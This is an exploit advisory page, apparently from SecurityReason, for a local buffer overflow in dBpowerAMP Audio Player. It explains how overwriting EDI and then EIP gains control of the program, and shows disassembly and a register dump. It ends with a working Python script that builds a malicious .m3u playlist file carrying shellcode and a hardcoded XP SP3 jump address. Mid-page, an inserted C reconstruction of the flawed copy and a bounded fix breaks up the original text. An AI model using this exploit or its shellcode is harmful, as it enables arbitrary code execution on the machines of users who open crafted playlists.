Topic: dBpowerAMP Audio Player local buffer overflow

WLB: WLB-2010090014
SecurityAlert: None
Date: 2010-09-03
Credit: 41.w4r10r and FB1H2S
SecurityRisk: High
Remote: No
Local: Yes
Status: Bug

History: [2010-09-03] Started

Affected software: dBpowerAMP Audio Player

Text:

# Exploit Title: dbpoweramp local buffer overflow, a different approach
# Date: 31/8/2010
# Author: 41.w4r10r and FB1H2S
# Software Link: http://usfiles.brothersoft.com/mp3_audio/players/dBpowerAMP-r2.exe
# Version: [app version]
# Tested on: Microsoft XP Service Pack 3
# CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0661

In the local exploits already published at
http://www.exploit-db.com/exploits/5069 and
http://www.exploit-db.com/exploits/5067, the software had an overflow
that could be exploited with a 255-character string: it would
overwrite EIP, but if the string goes above 255 characters EIP is not
overwritten; instead EDI is. The published exploit uses a direct
EIP overwrite with a 255-character string (shellcode + junk).
But it is also possible to exploit the application with a 255+ character
string in the following way.

1) 270 chars overwrite EDI and EIP remains intact
2) EDI (destination index) now points to our junk, and we have control over
EDI
3) EDI points to data, so overwrite it to point to EDX, which also holds
our junk; a JMP EDX will work
4) Now EIP will be overwritten, so in the second step make EIP point to EDI and
we can run our arbitrary code.

################################################################################################
With a 255+ character string, the disassembled code shows what is happening
################################################################################################
00422BD0 /$ 56             PUSH ESI
00422BD1 |. 57             PUSH EDI
00422BD2 |. 8B7C24 0C      MOV EDI,DWORD PTR SS:[ESP+C]
00422BD6 |. 83C9 FF        OR ECX,FFFFFFFF
00422BD9 |. 33C0           XOR EAX,EAX
00422BDB |. 6A 5C          PUSH 5C                                   ; /c = 5C ('\')
00422BDD |. F2:AE          REPNE SCAS BYTE PTR ES:[EDI]              ; |Repeat and
00422BDF |. 8B4424 14      MOV EAX,DWORD PTR SS:[ESP+14]             ; |
00422BE3 |. F7D1           NOT ECX                                   ; |
00422BE5 |. 2BF9           SUB EDI,ECX                               ; |
00422BE7 |. 50             PUSH EAX                                  ; |s
00422BE8 |. 8BD1           MOV EDX,ECX                               ; |
00422BEA |. 8BF7           MOV ESI,EDI                               ; |
00422BEC |. 8BF8           MOV EDI,EAX                               ; |
00422BEE |. C1E9 02        SHR ECX,2                                 ; |
00422BF1 |. F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> ; |
00422BF3 |. 8BCA           MOV ECX,EDX                               ; |
00422BF5 |. 83E1 03        AND ECX,3                                 ; |
00422BF8 |. F3:A4          REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[> ; |
00422BFA |. FF15 E4A14200  CALL DWORD PTR DS:[<&MSVCRT.strrchr>]     ; \strrchr
00422C00 |. 83C4 08        ADD ESP,8
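For comparison, the copy-then-strrchr pattern the disassembly above suggests (strlen via REPNE SCAS, unbounded REP MOVS copy into a caller-supplied buffer, then strrchr for the last backslash), reconstructed in C as an added example beside a bounded version that rejects playlist entries that do not fit. This is not the vendor's source; the 256-byte buffer size and the sample entries are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF 256  /* assumed fixed buffer size; the 255-char trigger hints at it */
/* Shape the disassembly suggests (assumption, not the vendor's source):
 * length via REPNE SCAS, unbounded copy via REP MOVS into a caller-supplied
 * buffer, then strrchr() for the last backslash. An entry longer than the
 * buffer writes past it, over the saved registers and the return address. */
const char *last_sep_unchecked(const char *entry, char *dst)
{
    strcpy(dst, entry);             /* no length check: the overflow */
    return strrchr(dst, '\\');
}

/* Bounded form: look for the terminator within dstsz bytes, reject anything
 * that does not fit, then copy. Returns the index of the last backslash,
 * 0 if there is none, or -1 when the entry is rejected. */
long last_sep_checked(const char *entry, char *dst, size_t dstsz)
{
    size_t n = 0;
    while (n < dstsz && entry[n] != '\0')
        n++;
    if (n == dstsz)                 /* no terminator within dstsz: reject */
        return -1;
    memcpy(dst, entry, n + 1);
    const char *sep = strrchr(dst, '\\');
    return sep ? (long)(sep - dst) : 0;
}

/* Constructed inputs: a normal playlist entry and a 299-byte run of 'A'. */
long check_short_entry(void)
{
    char buf[PATH_BUF];
    return last_sep_checked("C:\\Music\\track.mp3", buf, sizeof buf);
}

long check_long_entry(void)
{
    char entry[300], buf[PATH_BUF];
    memset(entry, 'A', sizeof entry - 1);
    entry[sizeof entry - 1] = '\0';
    return last_sep_checked(entry, buf, sizeof buf);
}

int main(void)
{
    printf("short entry -> %ld, 299-byte entry -> %ld\n",
           check_short_entry(), check_long_entry());   /* 8, -1 */
    return 0;
}
```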

#The registers at the time of the overflow

EAX 00000000
ECX FFFFFFFF
EDX 00B9ECD8 ASCII "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+[Our Junk]
EBX 00B9F110 ASCII "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+[Our Junk]
ESP 00B9ECB4
EBP 77C3F931 msvcrt.sprintf
ESI 00B9F285
EDI 41414141
EIP 00422BDD Amp.00422BDD
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDC000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -??? FFFF 00000000 7C90E920
ST1 empty +UNORM 0060 00140000 00000000
ST2 empty 0.0000000076189029870e-4933
ST3 empty 0.0208724709907450280e-4933
ST4 empty +UNORM 770A 0012F850 00000000
ST5 empty 0.0208724786043381110e-4933
ST6 empty +UNORM 2CCE 0012F588 00890000
ST7 empty -??? FFFF 7C919318 7C90E920
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

##############################################################################################################################
#!/usr/bin/python
#
#And all greets to Garage Hackers Members.
#http://www.garage4hackers.com
#And shouts to ICW, Andhra Hackers members
#
#and our Brothers:-
#B0Nd,Eberly,Wipu,beenu,w4ri0r,empty,neo,Rohith,Sids786,SmartKD,Tia,h@xor,r5scal,Yash,Secure_IT, Atul, Vinnu and all others.
#
shellcode=("\x90\x90\xcc\x90\x90\x90\x90\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
"\x7f\xe8\x7b\xca\x90\x90\x90\x90\x90\x90")
leng=260-len(shellcode)
junk = shellcode+"D"*leng
print len(junk)
junk=junk+"\xF0\xB0\x80\x7C"+"DCBA\xD8\xEC\xB9\x00"
#######################################################################################################################
#Make EDI point to EDX using a jump EDX, DCBA\xD8\xEC\xB9\x00 from the application
#now we will get control over EIP. Now point EIP to EDI [ jmp edi \xF0\xB0\x80\x7C from kernel32.dll, Microsoft Service Pack 3 ]
#######################################################################################################################
filename = "garage4hackers.m3u"
file = open(filename,"w")
file.writelines(junk)
file.close()
print "File Is created"
print "Press Any Key To Continue........."
raw_input()



References: None




Copyright © SecurityReason.com. All Rights Reserved.